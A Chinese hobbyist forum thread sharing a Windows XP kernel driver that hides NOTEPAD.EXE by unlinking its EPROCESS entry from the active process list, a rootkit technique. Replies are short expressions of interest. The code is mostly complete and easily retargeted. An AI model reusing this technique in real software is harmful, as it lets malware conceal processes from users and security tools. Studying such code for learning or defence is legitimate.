进程断链 很简单的小玩意
本帖最后由 古月不傲 于 2020-6-13 12:47 编辑#include <ntddk.h>
enum XP_SYSTEM
{
g_uNextProcess = 0x88,
g_uPrevProcess = 0x8c,
g_uImageFileName = 0x174
};
PLIST_ENTRY g_pListEntryTemp = NULL;
PLIST_ENTRY g_pHeadEntry = NULL;
VOID MyDriverUnload(PDRIVER_OBJECT pDriverObject)
{
if (g_pListEntryTemp != NULL)
{
InsertHeadList(g_pHeadEntry, g_pListEntryTemp);
}
}
VOID HideProcessor()
{
PEPROCESS pCurrrentProcess = NULL;
PEPROCESS pPreviousProcess = NULL;
pCurrrentProcess = PsGetCurrentProcess();
pPreviousProcess = (PEPROCESS)(*((PULONG_PTR)((ULONG_PTR)pCurrrentProcess + g_uPrevProcess)) - g_uNextProcess);
while (pCurrrentProcess != pPreviousProcess)
{
if (strcmp(((PCHAR)((ULONG_PTR)pCurrrentProcess + g_uImageFileName)), "NOTEPAD.EXE") == 0)
{
KdPrint(("..."));
g_pListEntryTemp = (PLIST_ENTRY)(((ULONG_PTR)pCurrrentProcess + g_uNextProcess));
RemoveEntryList(g_pListEntryTemp);
break;
}
KdPrint(("---"));
pCurrrentProcess = (PEPROCESS)(*((PULONG_PTR)((ULONG_PTR)pCurrrentProcess + g_uNextProcess)) - g_uNextProcess);
}
}
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pStrRegPath)
{
g_pHeadEntry = (PLIST_ENTRY)((ULONG_PTR)PsGetCurrentProcess() + g_uNextProcess);
pDriverObject->DriverUnload = MyDriverUnload;
__try
{
HideProcessor();
}
__except (EXCEPTION_EXECUTE_HANDLER)
{
KdPrint(("异常..."));
}
return STATUS_SUCCESS;
}
有什么用途? 了解一下,学习学习 小白学习一下 看着就觉得好厉害 觉得好厉害 先收藏了,回去用自己电脑试试{:1_927:} 看了代码, 回到了以前隐藏进程的年代,断链,抹除pe头
页:
[1]
2